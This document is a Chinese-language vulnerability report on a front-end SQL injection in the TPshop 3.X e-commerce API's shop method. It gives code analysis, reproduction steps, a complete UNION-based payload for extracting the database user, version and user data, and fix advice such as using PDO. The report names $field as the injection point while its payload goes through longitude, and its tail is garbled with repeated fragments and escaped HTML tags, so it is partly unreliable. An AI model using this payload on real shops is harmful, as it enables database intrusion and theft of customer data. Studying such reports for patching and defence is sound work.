TPshop API接口前台SQL注入漏洞分析报告<\/h1>

漏洞概述<\/h2>
TPshop电商系统（3.X版本）存在一个前台SQL注入漏洞，攻击者可通过构造恶意请求获取数据库敏感信息。该漏洞位于`\/application\/home\/controller\/Api.php<\/code>控制器的shop<\/code>方法中，由于未对用户输入进行有效过滤，导致SQL注入风险。<\/p>`

漏洞详情<\/h2>
受影响版本<\/h3>

TPshop 3.X系列版本<\/li>
<\/ul>
漏洞位置<\/h3>
\/application\/home\/controller\/Api.php<\/code>中的shop<\/code>方法<\/p>
漏洞类型<\/h3>
SQL注入<\/p>
漏洞成因<\/h3>

未对用户输入参数进行预编译处理<\/li>
直接将用户可控变量拼接到SQL语句中执行<\/li>
<\/ol>
漏洞分析<\/h2>
代码分析<\/h3>
关键代码段位于Api.php<\/code>的shop<\/code>方法：<\/p>
379<\/span>~<\/span>384<\/span>行<\/span>:<\/span> 获取外部输入并赋值给变量<\/span>
<\/span><\/span>385<\/span>~<\/span>387<\/span>行<\/span>:<\/span> 检查<\/span>$province_id、$city_id、$district_id是否为空
<\/span><\/span>388<\/span>行<\/span>:<\/span> 将上述参数放入<\/span>$where数组
<\/span><\/span>389<\/span>行<\/span>:<\/span> 定义<\/span>$field变量赋值为*<\/span>
<\/span><\/span>390<\/span>行<\/span>:<\/span> 定义<\/span>$order变量赋值为shop_id desc<\/span>
<\/span><\/span>391<\/span>行<\/span>:<\/span> 检查<\/span>$longitude是否为真
<\/span><\/span>392<\/span>行<\/span>:<\/span> 将<\/span>$longitude、$latitude拼接到SQL语句
<\/span><\/span>393<\/span>行<\/span>:<\/span> 将<\/span>$order赋值为distance ASC<\/span>
<\/span><\/span>395<\/span>行<\/span>:<\/span> 检查<\/span>$shop_address是否为真
<\/span><\/span>396<\/span>行<\/span>:<\/span> 将<\/span>$shop_address放入$where数组
<\/span><\/span>399<\/span>行<\/span>:<\/span> 执行SQL查询<\/span>
<\/span><\/span><\/code><\/pre>漏洞触发点<\/h3>
$field<\/code>变量传入field<\/code>方法时未进行预编译处理，而是直接拼接到SQL语句中执行。<\/p>
漏洞复现<\/h2>
测试环境<\/h3>

TPshop 3.X<\/li>
示例URL: http:\/\/www.example.com\/index.php\/home\/api\/shop<\/code><\/li>
<\/ul>
复现步骤<\/h3>

发送POST请求到目标URL<\/li>
构造恶意参数：
province_id=1&city_id=2&district_id=1&shop_address=aaaa&latitude=1&longitude=1'
<\/code><\/pre>
<\/li>
观察数据库错误返回<\/li>
<\/ol>
完整Payload<\/h3>
province_id=1&city_id=2&district_id=1&shop_address=aaaa&latitude=1&longitude=1- latitude)* 111),2))),2) AS distance FROM `tp_shop` WHERE `deleted` = :where_deleted AND `shop_status` = :where_shop_status AND `province_id` = :where_province_id AND `city_id` = :where_city_id AND `district_id` = :where_district_id AND ( `shop_name` LIKE :where_shop_name OR `shop_address` LIKE :where_shop_address ) UNION(SELECT(user()),(version()),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28))%23
<\/code><\/pre>
注意<\/strong>：实际使用时需要根据目标系统的字段数调整Payload。<\/p>
利用效果<\/h3>

查询数据库用户：
SELECT(user())
<\/code><\/pre>
<\/li>
查询数据库版本：
SELECT(version())
<\/code><\/pre>
<\/li>
查询数据库名<\/li>
查询表结构<\/li>
查询用户数据<\/li>
<\/ol>
修复建议<\/h2>

对所有用户输入参数进行严格的过滤和验证<\/li>
使用预编译语句(PDO)替代直接拼接SQL<\/li>
对数字型参数进行强制类型转换<\/li>
对字符串参数进行转义处理<\/li>
最小化数据库用户权限<\/li>
<\/ol>
总结<\/h2>
该漏洞展示了开发过程中忽视输入验证和SQL预编译处理可能导致的严重后果。开发人员应始终遵循"不信任任何用户输入"的原则，对所有外部输入进行严格验证和过滤。<\/p>
安全箴言<\/strong>：代码千万行，安全第一条，开发(PDO)不规范，系统被插惨。<\/p>

TPshop API接口前台SQL注入漏洞分析报告<\/h1>

漏洞位置<\/h3>
`\/application\/home\/controller\/Api.php<\/code>中的shop<\/code>方法<\/p>`

漏洞分析<\/h2>

漏洞触发点<\/h3>
`$field<\/code>变量传入field<\/code>方法时未进行预编译处理，而是直接拼接到SQL语句中执行。<\/p>`

TPshop API接口前台SQL注入漏洞分析报告<\/h1>

漏洞位置<\/h3> \/application\/home\/controller\/Api.php<\/code>中的shop<\/code>方法<\/p>

漏洞分析<\/h2>

漏洞触发点<\/h3> $field<\/code>变量传入field<\/code>方法时未进行预编译处理，而是直接拼接到SQL语句中执行。<\/p>

漏洞位置<\/h3>
`\/application\/home\/controller\/Api.php<\/code>中的shop<\/code>方法<\/p>`

漏洞触发点<\/h3>
`$field<\/code>变量传入field<\/code>方法时未进行预编译处理，而是直接拼接到SQL语句中执行。<\/p>`